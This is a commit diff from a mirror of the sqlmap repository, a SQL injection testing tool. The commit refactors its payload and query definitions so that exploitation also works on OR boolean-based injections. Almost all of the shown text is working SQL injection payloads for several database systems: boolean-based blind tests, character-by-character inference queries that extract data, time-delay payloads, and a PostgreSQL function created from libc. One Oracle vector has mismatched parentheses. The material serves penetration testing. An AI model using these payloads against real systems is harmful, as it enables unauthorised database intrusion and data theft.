sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor code refactoring and finally make exploitation work also on OR boolean-based injections

Browse Source
This commit is contained in:
Bernardo Damele 2010-12-05 11:25:44 +00:00
parent 7a5cd3b35f
commit 41e1b95c6c
3 changed files with 56 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/core/agent.py
View File

@ -213,9 +213,7 @@ class Agent:
payload = payload.replace("[ORIGVALUE]", origvalue) payload = payload.replace("[ORIGVALUE]", origvalue)
if kb.dbms is not None: if kb.dbms is not None:
# NOTE: ugly hack due to queries.xml's <inference> tag inferenceQuery = queries[kb.dbms].inference.query
# starting with 'AND ' string
inferenceQuery = queries[kb.dbms].inference.query[4:]
payload = payload.replace("[INFERENCE]", inferenceQuery) payload = payload.replace("[INFERENCE]", inferenceQuery)
return payload return payload

54
xml/payloads.xml
View File

@ -402,6 +402,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<vector>AND [INFERENCE]</vector>
<request> <request>
<payload>AND [RANDNUM]=[RANDNUM]</payload> <payload>AND [RANDNUM]=[RANDNUM]</payload>
</request> </request>
@ -410,6 +411,40 @@ Formats:
</response> </response>
</test> </test>
<test>
<title>AND boolean-based blind - WHERE clause (MySQL comment)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>AND [INFERENCE]</vector>
<request>
<payload>AND [RANDNUM]=[RANDNUM]</payload>
<comment>#</comment>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test>
<title>AND boolean-based blind - WHERE clause (Generic comment)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>AND [INFERENCE]</vector>
<request>
<payload>AND [RANDNUM]=[RANDNUM]</payload>
<comment>--</comment>
</request>
<response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
</response>
</test>
<test> <test>
<title>OR boolean-based blind - WHERE clause</title> <title>OR boolean-based blind - WHERE clause</title>
<stype>1</stype> <stype>1</stype>
@ -417,6 +452,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>2</where> <where>2</where>
<vector>OR [INFERENCE]</vector>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM1]</payload> <payload>OR [RANDNUM]=[RANDNUM1]</payload>
</request> </request>
@ -432,6 +468,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>2</where> <where>2</where>
<vector>OR [INFERENCE]</vector>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM1]</payload> <payload>OR [RANDNUM]=[RANDNUM1]</payload>
<comment>#</comment> <comment>#</comment>
@ -451,6 +488,7 @@ Formats:
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>2</where> <where>2</where>
<vector>OR [INFERENCE]</vector>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM1]</payload> <payload>OR [RANDNUM]=[RANDNUM1]</payload>
<comment>--</comment> <comment>--</comment>
@ -488,7 +526,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
</request> </request>
@ -508,7 +546,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request> </request>
@ -527,7 +565,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request> </request>
@ -546,7 +584,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload> <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
</request> </request>
@ -586,7 +624,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector> <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
<request> <request>
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
</request> </request>
@ -606,7 +644,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector> <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request> <request>
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request> </request>
@ -625,7 +663,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector> <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request> <request>
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request> </request>
@ -644,7 +682,7 @@ Formats:
<risk>1</risk> <risk>1</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector> <vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
<request> <request>
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
</request> </request>

18
xml/queries.xml
View File

@ -24,7 +24,7 @@
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/> <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
<substring query="MID((%s), %d, %d)"/> <substring query="MID((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/> <inference query="ORD(MID((%s), %d, 1)) > %d"/>
<banner query="VERSION()"/> <banner query="VERSION()"/>
<current_user query="CURRENT_USER()"/> <current_user query="CURRENT_USER()"/>
<current_db query="DATABASE()"/> <current_db query="DATABASE()"/>
@ -96,7 +96,7 @@
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/> <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
<substring query="SUBSTR((%s)::text, %d, %d)"/> <substring query="SUBSTR((%s)::text, %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/> <inference query="ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/> <banner query="SELECT VERSION()"/>
<current_user query="SELECT CURRENT_USER"/> <current_user query="SELECT CURRENT_USER"/>
<current_db query="SELECT CURRENT_DATABASE()"/> <current_db query="SELECT CURRENT_DATABASE()"/>
@ -162,7 +162,7 @@
<timedelay query="WAITFOR DELAY '0:0:%d'"/> <timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/> <substring query="SUBSTRING((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/> <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/> <inference query="ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="SELECT @@VERSION"/> <banner query="SELECT @@VERSION"/>
<current_user query="SELECT SYSTEM_USER"/> <current_user query="SELECT SYSTEM_USER"/>
<current_db query="SELECT DB_NAME()"/> <current_db query="SELECT DB_NAME()"/>
@ -226,7 +226,7 @@
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/> <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
<substring query="SUBSTR((%s), %d, %d)"/> <substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/> <inference query="ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/> <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
<current_user query="SELECT USER FROM DUAL"/> <current_user query="SELECT USER FROM DUAL"/>
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/> <current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
@ -306,7 +306,7 @@
<timedelay query="SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(1000000%d))))"/> <timedelay query="SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(1000000%d))))"/>
<substring query="SUBSTR((%s), %d, %d)"/> <substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<inference query="AND SUBSTR((%s), %d, 1) > '%s'"/> <inference query="SUBSTR((%s), %d, 1) > '%s'"/>
<banner query="SELECT SQLITE_VERSION()"/> <banner query="SELECT SQLITE_VERSION()"/>
<current_user/> <current_user/>
<current_db/> <current_db/>
@ -353,7 +353,7 @@
<banner/> <banner/>
<current_user query="SELECT CURRENTUSER()"/> <current_user query="SELECT CURRENTUSER()"/>
<current_db/> <current_db/>
<inference query="AND ASC(MID((%s), %d, 1)) > %d"/> <inference query="ASC(MID((%s), %d, 1)) > %d"/>
<is_dba query="IIF(CURRENTUSER()='Admin',1,0)"/> <is_dba query="IIF(CURRENTUSER()='Admin',1,0)"/>
<dbs/> <dbs/>
<tables> <tables>
@ -389,7 +389,7 @@
<inband query="SELECT DISTINCT RDB$USER FROM RDB$USER_PRIVILEGES"/> <inband query="SELECT DISTINCT RDB$USER FROM RDB$USER_PRIVILEGES"/>
<blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/> <blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
</users> </users>
<inference query="AND ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d"/> <inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d"/>
<is_dba query="CURRENT_USER='SYSDBA'"/> <is_dba query="CURRENT_USER='SYSDBA'"/>
<tables> <tables>
<inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/> <inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
@ -432,7 +432,7 @@
<current_db query="SELECT DATABASE() FROM DUAL"/> <current_db query="SELECT DATABASE() FROM DUAL"/>
<order query="ORDER BY %s ASC"/> <order query="ORDER BY %s ASC"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<inference query="AND SUBSTR((%s), %d, 1) > '%s'"/> <inference query="SUBSTR((%s), %d, 1) > '%s'"/>
<delimiter query=","/> <delimiter query=","/>
<substring query="SUBSTR((%s), %d, %d)"/> <substring query="SUBSTR((%s), %d, %d)"/>
<users> <users>
@ -473,7 +473,7 @@
<timedelay query="WAITFOR DELAY '0:0:%d'"/> <timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/> <substring query="SUBSTRING((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/> <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/> <inference query="ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="SELECT @@VERSION"/> <banner query="SELECT @@VERSION"/>
<current_user query="SELECT SUSER_NAME()"/> <current_user query="SELECT SUSER_NAME()"/>
<current_db query="SELECT DB_NAME()"/> <current_db query="SELECT DB_NAME()"/>